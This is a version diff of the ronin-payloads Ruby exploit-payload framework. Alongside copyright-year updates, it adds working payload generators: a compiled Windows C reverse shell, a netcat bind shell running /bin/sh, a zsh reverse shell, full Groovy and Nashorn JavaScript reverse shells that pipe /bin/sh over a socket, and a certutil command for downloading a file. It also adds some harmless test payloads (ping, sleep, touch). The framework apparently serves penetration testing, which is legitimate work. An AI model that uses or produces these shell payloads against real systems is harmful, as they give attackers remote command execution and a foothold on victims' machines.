ronin-payloads 0.1.4 → 0.2.0.rc1

data/lib/ronin/payloads/builtin/bin/windows/reverse_shell.rb

@@ -0,0 +1,87 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/c_payload'
+require 'ronin/payloads/metadata/os'
+require 'ronin/payloads/mixins/reverse_shell'
+require 'ronin/payloads/mixins/tempfile'
+
+module Ronin
+  module Payloads
+    module Bin
+      module Windows
+        #
+        # Windows C reverse shell that executes "cmd".
+        #
+        class ReverseShell < CPayload
+
+          include Metadata::OS
+          include Mixins::ReverseShell
+          include Mixins::Tempfile
+
+          register 'bin/windows/reverse_shell'
+
+          os :windows
+
+          param :arch, Enum[:"x86-64", :i686], default: :"x86-64",
+                                               desc:    "The target arch"
+
+          param :os, Enum[:windows], default: :windows,
+                                     desc:    'The target OS'
+
+          author "postmodern"
+
+          summary 'Windows C reverse shell'
+          description <<~DESC
+            Windows reverse shell that executes "cmd" and is written in C.
+
+            Note: this payload requires mingw32.
+          DESC
+
+          references [
+            "https://github.com/izenynn/c-reverse-shell#readme",
+            "https://github.com/izenynn/c-reverse-shell/blob/main/windows.c"
+          ]
+
+          # The path to the `reverse_shell.c` file.
+          SOURCE_FILE = File.join(__dir__,'reverse_shell.c')
+
+          #
+          # Builds the shellcode.
+          #
+          def build
+            tempfile('reverse_shell', ext: '.c') do |tempfile|
+              compile(SOURCE_FILE, defs: {
+                                     'CLIENT_IP'   => "\"#{params[:host]}\"",
+                                     'CLIENT_PORT' => params[:port]
+                                   },
+                                   libs:   %w[ws2_32],
+                                   output: tempfile.path)
+
+              @payload = File.binread(tempfile.path)
+            end
+          end
+
+        end
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/cmd/awk/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/bash/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/lua/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/netcat/bind_shell.rb

@@ -0,0 +1,51 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+require 'ronin/payloads/mixins/bind_shell'
+
+module Ronin
+  module Payloads
+    module CMD
+      module Netcat
+        #
+        # A basic netcat bind shell command.
+        #
+        # @since 0.2.0
+        #
+        class BindShell < CommandPayload
+
+          include Mixins::BindShell
+
+          register 'cmd/netcat/bind_shell'
+
+          #
+          # Builds the netcat bind shell command.
+          #
+          def build
+            @payload = "nc -lp #{port} -e /bin/sh"
+          end
+
+        end
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/cmd/node/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published
@@ -25,7 +25,7 @@ require 'ronin/payloads/mixins/reverse_shell'
 module Ronin
   module Payloads
     module CMD
-      module NodeJS
+      module Node
         #
         # A basic `node` (Node.js) reverse shell command.
         #

data/lib/ronin/payloads/builtin/cmd/openssl/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/perl/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/php/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/ping.rb

@@ -0,0 +1,52 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+
+module Ronin
+  module Payloads
+    module CMD
+      #
+      # A simple `ping -c 4 127.0.0.1` command.
+      #
+      # @since 0.2.0
+      #
+      class Ping < CommandPayload
+
+        register 'cmd/ping'
+
+        param :host, String, default: '127.0.0.1',
+                             desc:    'The host to ping'
+
+        param :count, Integer, default: 4,
+                               desc:    'The number of packets to send'
+
+        #
+        # Builds the `ping` command.
+        #
+        def build
+          @payload = "ping -c #{params[:count]} #{params[:host]}"
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/python/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/ruby/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/cmd/sleep.rb

@@ -0,0 +1,49 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+
+module Ronin
+  module Payloads
+    module CMD
+      #
+      # A simple `sleep 5` command.
+      #
+      # @since 0.2.0
+      #
+      class Sleep < CommandPayload
+
+        register 'cmd/sleep'
+
+        param :secs, Integer, default: 5,
+                              desc:    'The number of seconds to sleep'
+
+        #
+        # Builds the `sleep` command.
+        #
+        def build
+          @payload = "sleep #{params[:secs]}"
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/cmd/touch.rb

@@ -0,0 +1,49 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+
+module Ronin
+  module Payloads
+    module CMD
+      #
+      # A simple `touch /tmp/pwned` command.
+      #
+      # @since 0.2.0
+      #
+      class Touch < CommandPayload
+
+        register 'cmd/touch'
+
+        param :file, String, default: '/tmp/pwned',
+                             desc:    'The file to touch'
+
+        #
+        # Builds the `touch` command.
+        #
+        def build
+          @payload = "touch #{params[:file]}"
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/cmd/windows/download.rb

@@ -0,0 +1,70 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+require 'ronin/payloads/metadata/os'
+
+module Ronin
+  module Payloads
+    module CMD
+      module Windows
+        #
+        # Uses `certutil` to download a file.
+        #
+        # @since 0.2.0
+        #
+        class Download < CommandPayload
+
+          include Metadata::OS
+
+          register 'cmd/windows/download'
+
+          summary 'Downloads a file on Windows'
+          description <<~DESC
+            Uses the `certutil` Windows command to download a URL and save it
+            to a sepcific destination file.
+
+            The technique of using builtin system utilities for alternative
+            purposes is known as Living Off The Land (LOTL). These builtin
+            system binaries, which can be used for alternative purposes, are
+            known as "LOLbins".
+          DESC
+
+          os :windows
+
+          param :url, String, required: true,
+                              desc:    'The URL to download'
+
+          param :dest, String, required: true,
+                               desc:    'The destination file'
+
+          #
+          # Builds the `certutil` command.
+          #
+          def build
+            @payload = "certutil -urlcache -f '#{params[:url]}' #{params[:dest]}"
+          end
+
+        end
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/cmd/zsh/reverse_shell.rb

@@ -0,0 +1,55 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/command_payload'
+require 'ronin/payloads/mixins/reverse_shell'
+
+module Ronin
+  module Payloads
+    module CMD
+      module Zsh
+        #
+        # A basic zsh reverse shell command.
+        #
+        # @since 0.2.0
+        #
+        class ReverseShell < CommandPayload
+
+          include Mixins::ReverseShell
+
+          register 'cmd/zsh/reverse_shell'
+
+          description <<~DESC
+            A basic zsh reverse shell command.
+          DESC
+
+          #
+          # Builds the zsh reverse shell command.
+          #
+          def build
+            @payload = "zsh -c 'zmodload zsh/net/tcp && ztcp #{host} #{port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
+          end
+
+        end
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/groovy/reverse_shell.rb

@@ -0,0 +1,54 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/groovy_payload'
+require 'ronin/payloads/mixins/reverse_shell'
+
+module Ronin
+  module Payloads
+    module Groovy
+      #
+      # A basic Groovy reverse shell.
+      #
+      # @since 0.2.0
+      #
+      class ReverseShell < GroovyPayload
+
+        include Mixins::ReverseShell
+
+        register 'groovy/reverse_shell'
+
+        summary 'A basic Groovy reverse shell'
+        description <<~DESC
+          A basic Groovy reverse shell command.
+        DESC
+
+        #
+        # Builds the Groovy reverse shell command.
+        #
+        def build
+          @payload = %{Process p=new ProcessBuilder("/bin/sh").redirectErrorStream(true).start();Socket s=new Socket(#{host.inspect},#{port});InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();}
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/java/reverse_shell.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/js/nashorn/reverse_shell.rb

@@ -0,0 +1,63 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/nashorn_payload'
+require 'ronin/payloads/mixins/reverse_shell'
+
+module Ronin
+  module Payloads
+    module JS
+      module Nashorn
+        #
+        # A basic [Nashorn] JavaScript reverse shell.
+        #
+        # [Nashorn]: https://www.oracle.com/technical-resources/articles/java/jf14-nashorn.html
+        #
+        # @since 0.2.0
+        #
+        class ReverseShell < NashornPayload
+
+          include Mixins::ReverseShell
+
+          register 'js/nashorn/reverse_shell'
+
+          description <<~DESC
+            A basic Nashorn JavaScript reverse shell.
+          DESC
+
+          references [
+            'https://gist.github.com/frohoff/8e7c2bf3737032a25051'
+          ]
+
+          #
+          # Builds the [Nashorn] JavaScript reverse shell payload.
+          #
+          # [Nashorn]: https://www.oracle.com/technical-resources/articles/java/jf14-nashorn.html
+          #
+          def build
+            @payload = %{var p=new java.lang.ProcessBuilder("/bin/sh").redirectErrorStream(true).start();var s=new java.net.Socket(#{host.dump},#{port});var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();}
+          end
+
+        end
+      end
+    end
+  end
+end